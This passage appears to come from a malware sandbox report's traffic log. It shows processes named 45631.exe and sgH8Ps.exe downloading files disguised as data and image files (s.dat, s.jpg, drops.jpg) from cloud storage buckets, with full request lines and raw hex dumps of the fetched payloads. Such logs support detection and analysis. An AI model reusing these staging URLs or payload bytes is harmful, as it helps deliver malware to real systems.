c8 38 12 5d a5 a6 a8 b9 81 05 24 3e 7f 87 5f e9 b2 ac d8 50 4b 41 40 ae 76 80 40 a4 58 df 93 6f bb a4 25 c4 dc 1b f9 98 6d 46 50 50 85 Data Ascii: eE9BXtiasi@aYuS4J@cRRIrxd9_RxUE7KRM"z+wU4vKA6Ppr4bdl#IafK>tjI6a!aK?/qf/<}^q8]$>_PKA@v@Xo%mFPP
2025-01-02 11:14:13 UTC	4096	IN	Data Raw: 6b 24 f1 76 c7 84 af a6 d8 72 87 9e 02 98 c2 20 b2 f1 7e 40 de 11 c4 b7 04 70 3b 4c f8 6d db 2d a9 ce 60 f5 10 4c 12 54 c5 c0 72 2e a1 d8 20 3a 3e 2a 25 eb 4b 0d 65 55 1a c4 48 1a 5e 6a 05 eb 8f 85 11 75 4e 9c 4d 91 ea 1e 6c 58 58 23 d5 a9 a7 43 0b 1c de b1 07 fa 5d 5e fb 87 19 ab 0f 82 15 1e ba 6f f1 63 c6 da 5d 0e ab af 31 1b bf 5a cd f6 53 1f 80 ab 2c 54 0f 0f 1b 81 1b a2 ce 13 0d 34 7e c8 33 6a cb 2c 24 f8 95 15 fe 8e 9d b5 5f fa 6f 6b 71 de 1e b5 8b 59 19 1d 09 5e ac 7c 16 63 9b d8 c8 b4 27 9d 9d bb 43 03 b0 6a a2 cc 20 6c 87 15 fd 83 53 0b 74 ba be 94 f4 dc 67 c5 f1 cb 96 3f f5 5d c0 5a b8 19 35 ae dd 45 b8 22 e8 49 6d f7 25 8d 40 da 70 d0 35 af 4d f4 b8 23 50 f0 45 df 6d c4 90 0a 98 39 7d 78 78 2e 64 92 61 cf c0 27 77 aa e9 3f f8 8d 38 ff 14 79 a3 Data Ascii: k$vr ~@p;Lm-`LTr. :>*%KeUH^juNMlXX#C]^oc]1ZS,T4~3j,$_okqY^\|c'Cj lStg?]Z5E"Im%@p5M#PEm9}xx.da'w?8y
2025-01-02 11:14:13 UTC	4096	IN	Data Raw: 65 0f 82 22 33 6c 58 70 0d b8 a6 df ea 7b 6d 7a 5f 99 fd 73 8d 00 c9 26 96 32 5f 9a 2d 5f 52 cd c3 af 35 d2 10 ab ac 7d 75 1f 92 32 53 12 21 c0 0e a8 ca d8 dd c7 d0 35 03 63 e9 2c 3e eb 04 88 24 5d 20 1c fa f5 63 e0 67 b3 2a db a8 82 4f 91 91 6e 78 3a 77 32 95 d2 d2 f3 31 f7 3a 09 7f 6b 09 80 20 ed f3 ca fa b6 ca 1e 07 6f f1 ea 8e 7e 4f df f1 ee 66 ca 0f a7 51 14 14 36 25 dc 96 50 91 b0 60 93 09 88 28 f5 58 20 ee bf f1 ff 75 17 d6 a0 c8 e1 27 4f 1e 06 29 03 1c 90 34 5d e2 3e e3 1d 28 c6 67 37 ac 93 2b e2 78 8e 2e d7 4d 83 2a 0a 90 3e 9f 8f 15 a3 7a 0a 90 76 d6 47 dd 4b e2 82 19 56 f6 3f ee a6 6f 8c 4a 79 5f df 1d 79 90 90 40 b3 29 a8 08 35 66 cc 97 f8 29 cb b8 4b 89 f7 f9 13 42 7a ec 0b d1 0c f7 79 ec 74 3d d3 55 25 47 d7 82 00 94 7d a5 84 da b6 7d d4 af Data Ascii: e"3lXp{mz_s&2_-_R5}u2S!5c,>$] cgOnx:w21:k o~OfQ6%P`(X u'O)4]>(g7+x.M>zvGKV?oJy_y@)5f)KBzyt=U%G}}
2025-01-02 11:14:13 UTC	4096	IN	Data Raw: d2 e7 86 d8 b8 2d 86 04 1b e1 8b 98 09 7a 3b fe 9c 4d 52 15 f8 12 ed 29 9d a8 0f 40 e6 e5 0b eb ad 15 c7 ff 17 26 89 1c e1 b5 91 c7 16 33 50 17 9c 37 41 d3 06 73 61 28 5f ab 72 93 98 00 8a 6a 27 25 8b 41 b0 e7 2a 40 2e 6b be e6 f0 18 0c d2 28 51 ab 0c 08 02 67 5f 1a 0c 87 3a cc d9 74 dd c0 fd 7b 99 48 59 37 8d c3 26 3f 4d cf ea ea 8f 47 36 91 83 9c f4 2f 52 87 f9 10 b6 44 68 27 93 d2 36 2f 5d 2c 59 59 de 90 b4 e8 85 d4 e9 71 8f 42 65 b0 d8 16 f6 ff 1e 3b 4d 23 fa 1f 9e 5f 66 d6 96 8f 3f 35 40 28 de 44 3a fe c4 20 45 37 b3 18 0e ff ad 2b a7 83 7e 88 3a 6c b9 b9 31 4d dd 30 2d 5f e5 98 94 26 e7 f1 17 4f ba 13 8e 17 f2 ca 4c 08 6f 8e 74 4a 05 8d c4 24 3d 4b fb 22 c3 67 31 f6 85 11 26 a8 6e cf 31 7a 78 b7 f3 05 66 c0 b6 4d c3 3a 0e 1c bb 55 6d 30 27 5a a7 5f Data Ascii: -z;MR)@&3P7Asa(_rj'%A*@.k(Qg_:t{HY7&?MG6/RDh'6/],YYqBe;M#_f?5@(D: E7+~:l1M0-_&OLotJ$=K"g1&n1zxfM:Um0'Z_
2025-01-02 11:14:13 UTC	4096	IN	Data Raw: 6d 99 07 e4 c7 b2 15 b2 42 6c 84 38 c1 7d 64 0c 9a 79 ff 71 01 27 59 e8 ac 0f 20 7d b1 81 7f 87 9c 7d 37 13 a4 d8 58 fb d7 aa 0d 1a 88 06 95 72 33 fc a9 08 eb 61 e5 1b 19 63 d2 aa 09 e2 b9 52 e1 a4 8a 08 e0 3b 67 e2 cf e9 55 97 b7 28 79 76 3f a4 7b d0 9c 14 c0 80 dc ab f5 4d 7c f8 cf 89 4a 4c ec 7a 99 13 8b 9f bf 89 fd cb 07 5c 57 9b f8 f0 51 1b 72 ea b3 52 b0 4e d4 50 16 0e f6 43 a8 45 5e f8 99 90 3e a9 4a 8f 23 54 4d 98 d2 f6 51 e0 54 ce c8 f3 3b ec 5d 4b 96 31 6f 39 fe 82 8b 66 a4 22 6a 74 1d 57 6f 34 15 b0 16 87 b1 79 02 74 8a 6e 8c ba ef c4 ed 35 cc c8 82 2e 56 35 d3 9b 89 05 6d 16 f0 98 8a 0e 66 25 2b c7 a1 c9 f5 3e b0 50 22 fe a6 40 5f f9 be 1c 04 3a 5e 6a f5 4b 68 7a cb ed b4 ba f8 98 a8 7f 86 9c b5 87 da e8 1e 72 b0 c5 a5 2a a9 48 4a cf 41 64 96 Data Ascii: mBl8}dyq'Y }}7Xr3acR;gU(yv?{M\|JLz\WQrRNPCE^>J#TMQT;]K1o9f"jtWo4ytn5.V5mf%+>P"@_:^jKhzr*HJAd

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.6	49987	39.103.20.59	443	1656	C:\Users\user\Desktop\45631.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 11:14:21 UTC	111	OUT	GET /s.dat HTTP/1.1 User-Agent: GetData Host: ry2ihs.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-02 11:14:21 UTC	559	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Thu, 02 Jan 2025 11:14:21 GMT Content-Type: application/octet-stream Content-Length: 28272 Connection: close x-oss-request-id: 6776750DB980BA38324E6575 Accept-Ranges: bytes ETag: "DB77A55916E3EC0311D54060C84F7F0F" Last-Modified: Thu, 02 Jan 2025 11:13:55 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 2704622320052455568 x-oss-storage-class: Standard x-oss-ec: 0048-00000113 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 23elWRbj7AMR1UBgyE9/Dw== x-oss-server-time: 2
2025-01-02 11:14:21 UTC	3537	IN	Data Raw: f5 e2 28 b8 bb b8 b8 b8 bc b8 b8 b8 47 47 b8 b8 00 b8 b8 b8 b8 b8 b8 b8 f8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 b8 50 b8 b8 b8 b6 a7 02 b6 b6 02 bf 7b 5a c3 7a 37 fa 16 63 5f 36 2c 7f 2f 5d 40 48 5d 3c 30 7d 3e 5f 50 50 51 25 71 33 34 14 46 41 5a 7a 33 34 7a 3e 35 29 5a 37 35 3e 3f 11 32 32 35 11 35 35 35 35 35 35 35 f6 81 47 5c db 89 40 66 e1 b3 7a 5c db 89 40 66 e1 b3 7b 5c e4 89 40 66 e8 cb e9 5c d8 89 40 66 e8 cb ef 5c d8 89 40 66 e8 cb f9 5c df 89 40 66 e8 cb f0 5c d5 89 40 66 e8 cb ee 5c da 89 40 66 e8 cb eb 5c da 89 40 66 34 0f 05 0e 89 db 12 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 34 64 71 34 34 50 b2 3c 34 c2 67 ad 62 62 62 62 62 62 62 62 62 92 62 40 Data Ascii: (GGP{Zz7c_6,/]@H]<0}>_PPQ%q34FAZz34z>5)Z75>?2255555555G\@fz\@f{\@f\@f\@f\@f\@f\@f\@f44444444444444444444444444dq44P<4gbbbbbbbbbb@
2025-01-02 11:14:21 UTC	4096	IN	Data Raw: 05 23 23 56 27 a8 d8 33 c7 9d eb 2b a7 66 a7 83 f7 ef 2a 7e 0e 7a 6b e6 23 60 e2 be c6 b2 1d 08 46 3b 1d 1d 96 61 39 69 71 02 d2 a7 c2 59 15 5c 9c 11 31 89 34 31 31 b1 d8 bd 31 31 31 75 0a e5 79 0d b1 b4 b1 b1 31 da 49 d9 4c 5a 4c 4c 04 8f f4 4c 3f fc 4a 38 87 86 87 87 47 ac 2b 0a cc 09 ff 1e 84 0f 49 6c b1 90 b1 b1 f5 7e eb b1 7e 8d 3a f7 23 23 1a 3d 55 1c 1d d6 90 84 dc 1d fe de b7 75 bb 43 f3 36 f6 f4 bf 7b a3 b3 eb 2a e6 12 a7 6d a3 a3 e2 1b a3 a2 a3 a3 2a 6f d6 6b 25 92 60 2b 43 ca 06 43 ab 0f b6 ab ab ea 54 6d e2 63 27 ca e3 e3 e3 ab 62 a7 72 63 62 62 26 59 54 26 eb df 9b 10 58 d2 12 1e 36 5a 99 c5 bd c1 d1 5a bd f5 b1 f9 32 75 91 d0 cf d0 cc 8d 90 93 92 51 5e 5e 5e 92 92 92 92 da 19 56 da 53 82 d2 92 1b fa 82 da 53 aa c2 92 1b ea b2 d3 87 92 86 92 Data Ascii: ##V'3+f~zk#`F;a9iqY\1411111uy1ILZLLL?J8G+Il~~:##=UuC6{m*ok%`+CCTmc'brcbb&YT&X6ZZ2uQ^^^VSS
2025-01-02 11:14:21 UTC	4096	IN	Data Raw: 0a aa de df de de 96 1b c2 b2 b2 fa 3f fe 96 b6 d3 a5 5f 1a 6c 9f 6c b7 ab 28 48 78 54 49 48 48 b7 5d e9 fe e9 e9 a1 2c ed 85 91 6e 84 1f 86 86 86 0d c2 e6 f6 86 4f 14 4e cc b7 b2 c2 9e 3c 78 18 04 bf 47 bd ca b7 3a ef b6 5e d1 5e 5e 5e 1f 65 9d 2b 21 90 29 2b 2b 2b c2 ab ab ab ab 90 53 e5 ec d1 5a 0a 3a a6 25 5e a0 d3 84 58 97 f7 cf b6 cc 34 41 24 70 0c 90 28 46 0d 0d 0d 02 98 5b 1b 5b 9e 75 c7 a5 5d 28 4d 19 65 f9 41 2f 64 64 64 6b f1 32 72 32 f5 1e b0 76 0d 0f 78 1d 49 71 d5 6d 03 02 03 03 0c 99 cf 8f cf c7 24 ff 4c b4 4f 39 67 23 5f fb 43 09 42 43 43 4c d6 80 c0 03 ca 2b db 58 23 d1 ae b8 97 f2 8a b2 ff 9a ce f6 52 ea 84 85 84 84 3c 30 3c 3c 3c 33 78 e4 7d 56 a6 09 4a 0b 61 91 3e 15 7f 15 e5 91 fa a4 ce 15 ba ef 8f a4 54 fb 93 d2 b8 48 e7 ee a6 dc 3c Data Ascii: ?_ll(HxTIHH],nON<xG:^^^^e+!)+++SZ:%^X4A$p(F[[u](MeA/dddk2r2vxIqm$LO9g#_CBCCL+X#R<0<<<3x}VJa>TH<
2025-01-02 11:14:21 UTC	4096	IN	Data Raw: 4a 59 ce 0f c9 ba f8 0e 39 f9 8c 87 c4 73 45 cf 41 4f 0c f3 c4 84 0d fb cc 0f 79 76 31 fa 90 92 f6 1b 94 9e dd 17 7c 7e 1a f5 7d 8b bc 79 09 04 41 8a e0 e4 6b e4 ea a3 69 02 ee 67 ef a3 65 ad 2c a4 8c 89 f9 dc c1 4a 09 88 00 e9 03 74 14 5c 97 fd 1c 54 97 18 16 5f e9 df 5e d7 5f 2b ae e7 2d 4e a9 e4 2c 69 dc db 95 57 1f dc 10 00 1f 57 e0 d6 95 91 9f dc 6a a2 e2 6b 1f ec 56 94 dc 1f ba ba ba dc dc dc dc d3 c3 58 dc dc dc dc dc ba ba ba 4c 2a 2a dc 05 84 fc 05 25 25 25 56 67 2f ec 23 6d 95 21 e6 39 33 c9 71 ba 53 9a f2 33 72 2b 7f ba eb aa f2 31 75 3b 39 7d f6 69 77 34 cb fd 7c bd fc b5 f1 34 25 41 e1 7d fe 9d 62 94 e7 6b 6b 6b 0d 0d 0d 0d 02 12 89 0d 0d 0d 0d 0d 6b 9d 45 8c 76 8c 7c 73 8c 04 c6 cb eb cb cb cb 83 4a 22 4b 4b 4b 4b 44 5c 40 4e 4b 53 0f 41 0b Data Ascii: JY9sEAOyv1\|~}yAkige,Jt\T_^_+-N,iWWjkVXL**%%%Vg/#m!93qS3r+1u;9}iw4\|4%A}bkkkkEv\|sJ"KKKKD\@NKSA
2025-01-02 11:14:21 UTC	4096	IN	Data Raw: 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 28 68 7b 60 ab 47 9b e3 20 f9 68 ad 35 1d 35 35 35 7d b8 79 11 31 ee 04 f4 3b 0b 0b bc 31 f0 98 9c 63 89 4e 53 ac ac 1b d8 93 d0 27 cd 15 02 32 32 7a b1 f6 02 59 c1 ce ce 92 ce 8a ce a1 ce bd ce 8a ce ab ce b8 ce a7 ce ad ce ab ce bd ce 92 ce 9a ce bc ce bb ce ab ce 9d ce a7 ce a9 ce a6 ce ba ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce ce Data Ascii: (((((((((((((((((((((((((((((((((((((((((((((((((((((((h{`G h5555}y1;1cNS'22zY
2025-01-02 11:14:21 UTC	4096	IN	Data Raw: ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad ad fd ad ad e9 ad ad ad bd 0c b5 0c 2c ad 24 ad 9d 0c 95 0c 4c ad 44 ad fd 0c f5 0c 6c ad 64 ad dd 0c d5 0c 8c ad 84 ad 3d 0c 35 0c ac ad a4 ad 1d 0c 15 0c cc ad c4 ad 7d 0c 75 0c ec ad e4 ad 5d 0c 55 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c Data Ascii: ,$LDld=5}u]U
2025-01-02 11:14:21 UTC	4096	IN	Data Raw: a9 09 fd fc 12 13 1d 3c 88 0c c6 10 da 45 42 60 a9 c1 bc 1a 11 a7 e0 2e 22 2b 0a 8c d8 4c df a8 56 70 b6 bc 66 f5 56 67 09 82 f2 d3 a3 55 15 ce e3 6f 81 d8 c2 03 30 7c 10 15 ac 5c 86 7e 88 07 1f ba 3a fb b8 4b 9a 62 ec 00 e7 8e 85 12 6b 82 15 59 35 78 08 43 90 93 b7 4d 24 38 15 5e 33 ae 0e 03 b1 b4 8a 81 33 30 10 93 30 32 31 32 32 38 53 12 7f cb 7f 7f 7f 7f 7f 58 4f 42 49 46 65 e3 2d e3 92 9f 93 93 97 92 97 a7 e8 d9 e3 d8 e1 e7 e2 b4 e5 e3 f6 e7 b0 e3 81 a3 80 91 86 83 d5 d1 dd c6 df 88 be ac b7 de d9 d0 c3 ac ad f2 d3 e3 dd d5 d0 85 d4 d7 c3 c4 91 a6 a7 ca c8 c9 c3 f2 dd f3 df d9 dc 8a db d1 c8 ce 96 ff f5 e4 f9 8a 96 9f 8d ad ce e2 ff 8f 90 8d 9e ea f7 f1 f0 c1 d9 c0 d7 d1 d4 82 d3 d0 c0 f3 9e f7 fd ec f1 82 9e 97 85 a5 c6 ea e1 84 c1 b7 84 f6 ed e2 ed Data Ascii: <EB`."+LVpfVgUo0\|\~:KbkY5xCM$8^330021228SXOBIFe-
2025-01-02 11:14:21 UTC	159	IN	Data Raw: 56 8d a1 48 a7 d8 db 20 3c c6 64 eb a7 f5 dc 87 01 85 4d b3 73 df 7e 2f 72 c3 fe 90 7f 53 03 95 c3 69 b4 78 70 7f 47 cd 54 d7 16 ca e8 7a 26 d7 20 64 6e df e5 43 1a 7a 90 7c ad 5f 36 aa 81 b5 fe 6e b2 cd cf ba 1d 41 b4 54 53 e9 3f 79 f1 5e 23 29 65 39 09 a1 03 8d 0a fe 23 25 a7 5c cd 0e 5d 86 0a 45 0c 38 50 e4 30 db dd d2 af bb de fa 16 60 6f 98 ea 3b 50 91 e8 7f a4 41 45 cc 50 fe 5e b5 e2 5c 31 55 2a 67 69 1d 23 55 9c 19 fe aa 01 a8 35 68 df e2 53 d9 70 80 53 3d 1f dd f5 Data Ascii: VH <dMs~/rSixpGTz& dnCz\|_6nATS?y^#)e9#%\]E8P0`o;PAEP^\1U*gi#U5hSpS=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.6	49988	39.103.20.59	443	1656	C:\Users\user\Desktop\45631.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 11:14:22 UTC	111	OUT	GET /s.jpg HTTP/1.1 User-Agent: GetData Host: ry2ihs.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-02 11:14:23 UTC	543	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Thu, 02 Jan 2025 11:14:23 GMT Content-Type: image/jpeg Content-Length: 8299 Connection: close x-oss-request-id: 6776750F9F6B6036348ED9DB Accept-Ranges: bytes ETag: "9BDB6A4AF681470B85A3D46AF5A4F2A7" Last-Modified: Thu, 02 Jan 2025 10:14:13 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 692387538176721524 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: m9tqSvaBRwuFo9Rq9aTypw== x-oss-server-time: 3
2025-01-02 11:14:23 UTC	3553	IN	Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 90 00 90 00 00 ff e1 00 5a 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 05 03 01 00 05 00 00 00 01 00 00 00 4a 03 03 00 01 00 00 00 01 00 00 00 00 51 10 00 01 00 00 00 01 01 00 00 00 51 11 00 04 00 00 00 01 00 00 16 25 51 12 00 04 00 00 00 01 00 00 16 25 00 00 00 00 00 01 86 a0 00 00 b1 8f ff db 00 43 00 02 01 01 02 01 01 02 02 02 02 02 02 02 02 03 05 03 03 03 03 03 06 04 04 03 05 07 06 07 07 07 06 07 07 08 09 0b 09 08 08 0a 08 07 07 0a 0d 0a 0a 0b 0c 0c 0c 0c 07 09 0e 0f 0d 0c 0e 0b 0c 0c 0c ff db 00 43 01 02 02 02 03 03 03 06 03 03 06 0c 08 07 08 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 Data Ascii: JFIFZExifMM*JQQ%Q%CC
2025-01-02 11:14:23 UTC	4096	IN	Data Raw: 6a 97 a0 76 9f 8a 4c ce c2 04 d4 99 b6 a3 2e 14 ad df 13 51 65 93 89 43 91 9f a1 22 66 8b 67 93 6a a2 a8 41 af 7a 2c ae 4c aa 83 63 3f 31 b1 0c 38 b2 5a bc ee 9f ac 38 b8 3b d8 89 02 c6 e4 8d 4f 83 68 c8 cb e9 cd 46 82 eb f8 de 65 da d0 b3 5f 34 d9 d6 6d db 55 d9 bc fb a3 e2 61 23 e6 e4 e3 87 ec ad ee cf c4 48 ef c7 73 cd d6 f3 c4 81 f4 1c 39 58 f8 db f6 39 e6 54 8a 0c ef 0e 3c c4 02 47 ce 01 4a eb 07 3d 8b cf 64 01 b1 11 50 1f 56 fc 58 fd 52 90 48 39 56 7e 31 61 02 cb 69 da d9 d8 cc 26 ee 13 ab 4c 25 c9 2d d0 31 03 dc f8 c8 d7 3b 32 53 27 d0 3e e3 d2 43 01 15 0b c5 c7 aa 26 cf 01 8d 0f 68 05 6c 61 40 dc 57 84 5a 54 79 13 7c 39 5f 3b 5d be 3a 5e 38 29 ef 27 40 e5 0e 2f e3 91 59 ab d5 8c 1a 9b 83 db 73 71 24 d7 68 16 7f 18 08 bb 51 3d 32 5b d8 c4 b1 43 a5 Data Ascii: jvL.QeC"fgjAz,Lc?18Z8;OhFe_4mUa#Hs9X9T<GJ=dPVXRH9V~1ai&L%-1;2S'>C&hla@WZTy\|9_;]:^8)'@/Ysq$hQ=2[C
2025-01-02 11:14:23 UTC	650	IN	Data Raw: f2 f5 18 89 8e 8a db 3d b5 89 92 61 93 d9 95 d6 f9 fa e8 f6 8e e8 f9 2d 9f 8a 17 a0 e4 d1 c1 a0 b7 a6 2d 71 ae f8 c9 d9 ef da b0 c5 da fa da d3 d9 f2 c0 b8 ea 98 18 bd f0 db b2 82 ae c3 ad a0 a8 b3 8b a8 a6 a7 8d 1d d0 9d 80 92 80 87 97 c7 d6 97 a8 da 92 be bd ad bf db e0 e5 e2 8f 56 e5 a7 8b 84 86 89 eb ec 39 ec a8 95 85 a2 81 d4 9a 95 92 8b 8a ab fa fc fd fe b4 45 53 4c 46 48 36 34 f8 7b 0a 05 0b 03 0d 01 0f 1f 11 1d 13 1b 15 19 17 e7 16 1a 14 1c 12 1e 10 20 2e 22 2c 24 2a 26 28 28 d6 25 2b 23 2d 21 2f 3f 31 3d 33 3b 35 39 37 37 39 3a 3b 3c f6 8f 1f 40 51 42 43 63 45 76 3f 0a e1 4a 4b 7c 4d 3e 1b 54 09 32 53 6c 7f 97 57 40 d9 5a 77 8c 5d 42 42 71 c9 62 63 ec 65 4a 47 68 75 52 6b 60 38 6f e3 30 71 6e 2b 70 63 16 77 76 2e 4a 69 7c 7d ee 7e 96 81 8c 84 90 Data Ascii: =a--qV9ESLFH64{ .",$*&((%+#-!/?1=3;59779:;<@QBCcEv?JK\|M>T2SlW@Zw]BBqbceJGhuRk`8o0qn+pcwv.Ji\|}~

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.6	49991	118.178.60.9	443	6196	C:\Users\user\Documents\sgH8Ps.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 11:15:15 UTC	114	OUT	GET /drops.jpg HTTP/1.1 User-Agent: GetData Host: 22mm.oss-cn-hangzhou.aliyuncs.com Cache-Control: no-cache
2025-01-02 11:15:15 UTC	545	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Thu, 02 Jan 2025 11:15:15 GMT Content-Type: image/jpeg Content-Length: 37274 Connection: close x-oss-request-id: 67767543EE85213834733A46 Accept-Ranges: bytes ETag: "6D4DEB9526F3973DE0F9DCE9392F8EA7" Last-Modified: Wed, 23 Oct 2024 04:47:27 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 9193697774326766004 x-oss-storage-class: Standard x-oss-ec: 0048-00000105 Content-Disposition: attachment x-oss-force-download: true Content-MD5: bU3rlSbzlz3g+dzpOS+Opw== x-oss-server-time: 3
2025-01-02 11:15:15 UTC	3551	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 00 09 70 48 59 73 00 00 0b 13 00 00 0b 13 01 00 9a 9c 18 00 00 20 00 49 44 41 54 78 9c ed 9d 0b f8 6e e5 94 c0 97 91 14 26 45 21 4a 7f 25 4d 17 94 22 b9 cc 39 85 12 8d 90 2e 22 a7 9b 88 48 11 a9 4c 87 92 90 a4 d1 4c 49 3a 88 29 a1 90 4b 37 c2 14 21 83 34 51 f8 1f f7 7b ee cc 64 cc cc fe b5 ff 5b df f9 e6 fb fe df 5a 7b bf b7 ef db eb f7 3c eb 79 3c 39 ff 6f af fd ee 77 af fd be eb 5d 17 11 c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 71 1c c7 cc 1a 95 ac 33 25 b2 46 a4 31 70 9c de 72 44 25 ff 3b 25 72 44 a4 31 70 9c de e2 06 c0 71 7a 8c 1b 00 c7 e9 31 Data Ascii: PNGIHDR\rfpHYs IDATxn&E!J%M"9."HLLI:)K7!4Q{d[Z{<y<9ow]qqqqqqqqqqqqqqqqq3%F1prD%;%rD1pqz1
2025-01-02 11:15:15 UTC	4096	IN	Data Raw: b8 15 4d f0 da 0b 73 29 d8 06 f6 9f 9a 49 70 40 2e 05 0b 01 87 5f 9b 3d 3f fb 46 f6 f7 6d f6 f6 a1 c1 89 8a 9f a0 4d d0 15 3e 81 52 1c 83 39 a1 dc d8 a4 b1 fa 64 36 ed 8c e0 b1 d4 38 8c b0 7a eb 66 d2 b1 04 38 ea 6b e3 ed c7 43 bf 5d 06 7d 27 41 5d 01 4b 93 95 46 38 1d 28 e9 88 30 07 7c dd 35 db 80 d2 93 d3 6e 43 db 93 ed f2 5c 0a 16 82 a5 2d 59 23 ef 97 b2 7d 26 78 b5 3f 28 f6 fb 7a 57 0e 65 0b 82 17 5b 53 7b f0 79 b9 14 b4 a0 ad c2 72 68 2e 05 0b e0 b9 62 7f 49 e8 29 37 0d b5 09 f0 0d d0 e7 ce 7a 7f 7d df 0e 5e 2d 93 c7 e8 b2 6c da 29 21 c0 42 13 40 32 75 5e cd 80 10 db 6f e9 43 c0 76 ea a8 2c 9a 76 83 c0 2a 4b ec 00 01 61 a5 e5 0e a4 84 90 df 49 63 c4 b6 79 52 ad 81 ac 68 3b ec 7c 36 97 82 05 40 a5 18 cb 97 71 1a 5f fe 06 8c 80 e5 5e 2f cd a3 66 11 cc Data Ascii: Ms)Ip@._=?FmM>R9d68zf8kC]}'A]KF8(0\|5nC\-Y#}&x?(zWe[S{yrh.bI)7z}^-l)!B@2u^oCv,v*KaIcyRh;\|6@q_^/f
2025-01-02 11:15:15 UTC	4096	IN	Data Raw: d0 62 92 23 02 8f d8 7f 4b bb b9 f3 33 e8 e8 18 58 21 b6 49 77 40 06 1d 49 05 fd 8a 51 4f 8d b0 a7 bd 48 ea b2 d6 31 a1 a4 5b a8 ba 8e 83 f2 1b b1 75 d9 0d 05 45 38 2d 4d 44 3c 3c bc 50 38 4a b3 4c b8 f7 e5 51 53 4e 37 e8 d8 46 62 27 2f 59 92 6b ac 92 2b 02 ef 30 83 8e 18 8b 99 af dc 3b 6d 6c 22 f5 17 44 fb 10 73 ed e7 ac f9 08 7d 33 00 48 ae 08 bc 8b 0c 3a d2 fd b7 34 1f 4c 6f a1 21 c4 e7 45 ff f0 08 f5 dd 21 83 9e d6 7c 84 be 1a 80 5c 11 78 d6 50 e1 7f ce a0 a3 33 82 53 c5 36 c1 5e 9e 41 47 1c 74 57 18 f5 ec ab 01 40 7e 5a c9 7d 22 df c7 28 1e 2b b6 c8 d1 7d 32 e8 e8 0c f0 64 b1 2d a9 2f 93 3c 51 5d c7 19 74 ec da 9c 72 16 0c 00 42 6f be 1c 11 91 96 f6 75 d4 1d dc 28 83 8e 8e d4 c7 50 3f 13 db a4 3a 53 d2 3b 99 c8 2c fc b3 41 c7 fd a5 3e 9a c4 68 7c d5 Data Ascii: b#K3X!Iw@IQOH1[uE8-MD<<P8JLQSN7Fb'/Yk+0;ml"Ds}3H:4Lo!E!\|\xP3S6^AGtW@~Z}"(+}2d-/<Q]trBou(P?:S;,A>h\|
